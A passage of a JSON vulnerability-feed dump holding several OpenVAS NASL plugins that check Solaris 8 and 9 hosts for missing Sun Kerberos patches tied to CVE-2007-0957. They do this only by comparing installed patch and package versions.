"2017-07-02T21:13:59", "description": "Check for the Version of libkadm5", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for libkadm5 112921-09", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855493", "href": "http://plugins.openvas.org/nasl.php?oid=855493", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 112921-09\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855493);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112921-09\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 112921-09\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112921-09-1\");\n\n script_summary(\"Check for the Version of libkadm5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112921-09\", package:\"SUNWkrbu SUNWkdcu SUNWcstlx SUNWkrbux SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:19", "description": "Check for the Version of krb5 krb5kdc", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for krb5 krb5kdc 116045-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855233", "href": "http://plugins.openvas.org/nasl.php?oid=855233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for krb5 krb5kdc 116045-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"krb5 krb5kdc on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n krb5 krb5kdc\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855233);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116045-02\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for krb5 krb5kdc 116045-02\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116045-02-1\");\n\n script_summary(\"Check for the Version of krb5 krb5kdc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116045-02\", package:\"SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:58", "description": "Check for the Version of kadmind & kdb5_util", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kadmind & kdb5_util 116044-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855236", "href": "http://plugins.openvas.org/nasl.php?oid=855236", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kadmind & kdb5_util 116044-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kadmind & kdb5_util on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kadmind & kdb5_util\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855236);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116044-04\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for kadmind & kdb5_util 116044-04\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116044-04-1\");\n\n script_summary(\"Check for the Version of kadmind & kdb5_util\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116044-04\", package:\"SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:15", "description": "Check for the Version of Obsoleted by", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for Obsoleted by 109223-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855572", "href": "http://plugins.openvas.org/nasl.php?oid=855572", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Obsoleted by 109223-10\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Obsoleted by on solaris_5.8_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Obsoleted by\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855572);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:37:58 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109223-10\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for Obsoleted by 109223-10\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109223-10-1\");\n\n script_summary(\"Check for the Version of Obsoleted by\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", package:\"SUNWcsl SUNWgssx SUNWgss SUNWcslx SUNWcstlx SUNWcsu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:51", "description": "Check for the Version of libkadm5", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for libkadm5 116046-09", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855603", "href": "http://plugins.openvas.org/nasl.php?oid=855603", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 116046-09\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855603);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116046-09\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 116046-09\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116046-09-1\");\n\n script_summary(\"Check for the Version of libkadm5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116046-09\", package:\"SUNWkdcu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:48", "description": "Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1", "cvss3": {}, "published": "2009-09-23T00:00:00", "type": "openvas", "title": "Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109223-11", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855661", "href": "http://plugins.openvas.org/nasl.php?oid=855661", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109223-11\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kpasswd, libgss.so.1 and libkadm5clnt.so.1 on solaris_5.8_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kpasswd, libgss.so.1 and libkadm5clnt.so.1\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855661);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-23 10:48:35 +0200 (Wed, 23 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109223-11\");\n script_cve_id(\"CVE-2007-0957\");\n script_name(\"Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109223-11\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109223-11-1\");\n\n script_summary(\"Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-11\", package:\"SUNWcstl SUNWcslx SUNWcstlx SUNWcsu SUNWgss SUNWcsl SUNWgssx\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:42", "description": "Check for the Version of krb5 krb5kdc", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for krb5 krb5kdc 116045-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for krb5 krb5kdc 116045-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"krb5 krb5kdc on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n krb5 krb5kdc\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855233\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116045-02\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for krb5 krb5kdc 116045-02\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116045-02-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of krb5 krb5kdc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116045-02\", package:\"SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:14", "description": "Check for the Version of libkadm5 library", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for libkadm5 library 116175-05", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855127", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 library 116175-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 library on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5 library\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855127\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116175-05\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 library 116175-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116175-05-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of libkadm5 library\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116175-05\", package:\"SUNWkrbu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:55", "description": "Check for the Version of Obsoleted by", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for Obsoleted by 109224-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855375", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855375", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Obsoleted by 109224-10\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Obsoleted by on solaris_5.8_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Obsoleted by\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855375\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:37:58 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109224-10\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for Obsoleted by 109224-10\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109224-10-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Obsoleted by\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"109224-10\", package:\"SUNWcsl SUNWgss SUNWcsu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:21", "description": "Check for the Version of Obsoleted by", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for Obsoleted by 109223-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 